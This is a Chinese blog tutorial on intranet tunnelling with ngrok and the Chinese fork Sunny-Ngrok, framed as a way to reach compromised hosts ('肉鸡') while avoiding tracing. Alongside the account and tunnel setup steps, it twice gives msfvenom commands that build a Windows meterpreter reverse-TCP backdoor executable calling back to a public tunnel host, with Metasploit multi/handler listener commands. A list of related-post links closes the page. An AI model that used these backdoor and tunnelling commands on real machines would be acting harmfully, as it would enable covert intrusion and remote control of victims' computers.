【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)
目录
一、准备
1、意义:
2、项目:
二、内网穿透
1、简介:
三、Ngrok(入门上线)
1、简述:
2、Ngrok入门上线(国版二开)
3、相关工具:
2、Ngrok入门上线(美版)
一、准备
1、意义:
在代理连接肉鸡后实现本地渗透肉鸡网络架构
2、项目:
Linux:Proxychains
Windows:Sockscap Proxifier
穿透项目:Ngrok Frp Spp Nps EW(停更)
优点:穿透加密数据,中间平台,防追踪,解决网络问题
https://www.ngrok.cc
https://github.com/esrrhs/spp
https://github.com/fatedier/frp
https://github.com/ehang-io/nps
http://www.rootkiter.com/EarthWorm
二、内网穿透
1、简介:
1、内网穿透,也即 NAT 穿透,进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT 设备屏蔽而正确路由到内网主机。下面就相互通信的主机在网络中与 NAT 设备的相对位置介绍内网穿透方法。
2、UDP 内网穿透的实质是利用路由器上的NAT 系统。NAT 是一种将私有(保留)地址转化为合法IP地址的转换技术,它被广泛应用于各种类型 Internet 接入方式和各种类型的网络中。NAT可以完成重用地址,并且对于内部的网络结构可以实现对外隐蔽
(来源百度百科)
三、Ngrok(入门上线)
1、简述:
1)作用:ngrok 是一个反向代理,通过在公共的端点和本地运行的 Web 服务器之间建立一个安全的通道。ngrok 可捕获和分析所有通道上的流量,便于后期分析和重放。通过一个命令,便可将一个本地服务器暴露在NAT或防火墙后面的互联网。
2)官方解释:ngrok是一个简化的API优先入口即服务,它增加了连接性, 无需更改代码即可对您的应用程序进行安全性和可观察性
3)我的理解:
关键词:反向代理、公共、本地
通过反向代理,将局域网内的ip:port,转化为任何用户上网都可访问的URL一样
本地--->Ngrok服务器--->客户端
3)分析:
支持的协议:tcp、http、https
支持的类型:正向代理、反向代理
4)工具官网(美国的):
ngrok - Online in One Linengrok is the fastest way to put anything onthe internet with a single command.https://ngrok.com/
5)国产二开的管理平台:
Sunny-Ngrok
Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器https://www.ngrok.cc/
2、Ngrok入门上线(国版二开)
1)注册并登陆:
Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器
点击进行注册(免费的)
2)服务端配置:
实名认证--->开通隧道--->TCP协议--->指向IP和端口--->开通隧道--->连接隧道——————
实名认证(2块钱就可了)
填写相关信息
使用支付宝扫码,进行人脸识别
——————
开通隧道(先拿0元的试手)
——————
TCP协议--->域名进行设置--->指向IP和端口--->添加隧道--->确认开通
注意:
本地端口的填写,12.0.0.1代表localhost,紧接着的端口号是tomcat的端口号(可查看tomcat的server.xml文件中端口)
3)连接隧道:
下载客户端
根据自己的下载合适的ngrok客户端
打开ngrok客户端
输入需要启动的隧道id
实现本地的网站,可以映射到外网了
4)客户端生成后门配置监听:
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=80 -f exe -o tcp.exe
(注:lhos:外网ip、lport:外网端口)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
run(注:这个监听端口lport,与本地转发端口一致)
扩展:
隧道管理的地方-->修改-->修改为自定义域名
3、相关工具:
1)natapp
NATAPP -https://natapp.cn/tunnel/buy基本类似使用
2、Ngrok入门上线(美版)
1)下载:
ngrok - downloadhttps://ngrok.com/download
2)运行ngrok.exe
3)在Ngrok官网 注册账号
ngrok - Online in One Linehttps://ngrok.com/在用户中心找到authtoken(账户凭证)
方法一:
4)在ngrok命令行中输入:
ngrok authtoken 加上自己的凭据配置成功会如下提示: (创建.ngrok2文件夹、配置文件ngrok.yml) Authtoken saved to configuration file: C:\Users\****/.ngrok2/ngrok.yml
5)连接隧道:
ngrok http 80 (指定的tcp协议,以及自己的服务端口)
方法二:
4*)配置账户
ngrok config add-authtoken 加上自己的凭据
5*)连接隧道
ngrok http 80 (指定的tcp协议,以及自己的服务端口)
6)客户端生成后门配置监听:
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=80 -f exe -o tcp.exe(注:lhos:外网ip、lport:外网端口)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
run(注:这个监听端口lport,与本地转发端口一致)
【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)相关推荐
- 家政公司微信小程序源码运营版 开源可二开 含详细搭建教程
分享一个家政公司微信小程序源码完美运营版,代码开源可二开,含详细搭建教程,适合家政,保姆,保洁,维修等上门服务,含商户入驻功能. 源码下载地址:春哥技术博客-家政预约小程序源码
- 【内网安全-隧道搭建】内网穿透_Frp上线、测试
目录 Frp(简易上线) 1.简述: 2.工具: 3.使用: 1.准备: 2.服务端(公网): 2.客户端(内网): 3.测试方法: 4.生成后门木马监听: Frp(简易上线) 1.简述: 1)Frp ...
- 申请教育邮箱和使用微软 OneDrive API 和腾讯云 SCF 免费搭建个人网盘
参考注册地址 注册的学校是(Red Rocks Community College官网)注册申请时需要用到 参考注册地址2 国西南学院(Southwestern College) 为什么要申请教育邮箱 ...
- 玖乐解密垃圾某山代刷网废话不多自行看就行了可二开可运营
介绍: 玖乐解密垃圾某山代刷网全解! 废话不多自行看就行了可二开可运营 垃圾代刷网没有利用价值 我就只改了改部分版权! 你们想二开的速度去二开吧 网盘下载地址: https://zijiewangpa ...
- 抖音seo源码·源代码搭建·支持二开(开源)系统
抖音seo源码搭建,抖音seo源码,抖音seo源码搭建的基础底层框架语言是后台语言PHP:python来编程开发的,抖音seo这套源码,是围绕了ai视频创意制作,六大账号矩阵发布,智能客户回复,企业号 ...
- 内网穿透从搭建到溯源(内网隧道搭建、绕过、隧道流量分析、日志分析、隧道防护)
背景 在攻防博弈这个永久的话题中,永远不会缺少一个重要角色即内网穿透.当渗透测试人员在进入内网,需要扩大战果的时候,往往会遇到内网的一些防护策略,不外乎边界设备.防火墙及入侵检测设备对端口或者数据包的 ...
- nps+Proxifier搭建socks5代理隧道进行内网穿透
目录 一.实验环境搭建 二.nps 服务端配置 客户端配置 将npc注册到系统服务 三.Proxifiers使用 在渗透过程中,我们需要快速实现内网穿透,从而绕过网络访问限制,直接从外网来访问内网 正 ...
- 通过路由器搭建内网穿透隧道
通过路由器搭建内网穿透隧道 将本台计算机设置为一台服务器 控制面板中选择程序和功能,启用或关闭WINDOWS功能 选择左边启用或关闭 Windows 功能,勾选 Internet Informatio ...
- 【全过程记录】将windows电脑连接到ipad的rd client远程桌面,通过路由器搭建内网穿透隧道
caiyi 2021/10/03 通过路由器搭建内网穿透隧道 将本台计算机设置为一台服务器 文章目录 一.找到内网ip 二.找到端口号 三.在ipad上同一局域网下连接 四.在不同局域网下连接 五.突 ...
最新文章
- 生物系统和疾病的多组学数据整合考虑和研究设计
- php组件化开发composer,PHP组件化开发 - JimmyJaw的个人空间 - OSCHINA - 中文开源技术交流社区...
- 分布式:阿里云HSF转dubbo+zookeeper
- 利用python处理中国地面气候资料日值数据集(V3.0)
- Springboot 整合 swagger
- python运行程序的时间计算
- Windows 命令行改主机名、加域、退域、更改IP
- 【To Understand!】LeetCode 117. Populating Next Right Pointers in Each Node II
- python不可以安装的软件包_安装好的python包竟然无法import
- tbschedule使用
- C#简单实现office转pdf、pdf转图片
- matlab kappa风险分析,我为什么反对在属性数据MSA中用Kappa分析(上) | 汽车质量管理笔记...
- 解决SQLserver 数据库恢复挂起
- 医院排队叫号系统源码
- GPU Raid卡加持!PBlaze6 6920挑战8盘Raid5
- 《C语言程序设计》江宝钏主编-习题3-7-交换变量
- adb脚本选择语句_常用adb命令汇总(绝对干货)
- 斐波那契序列递归方法_斐波那契和卢卡斯序列
- linux下CUPS学习心得
- 基于微信小程序的流动人口管理移动APP设计与实现-计算机毕业设计源码+LW文档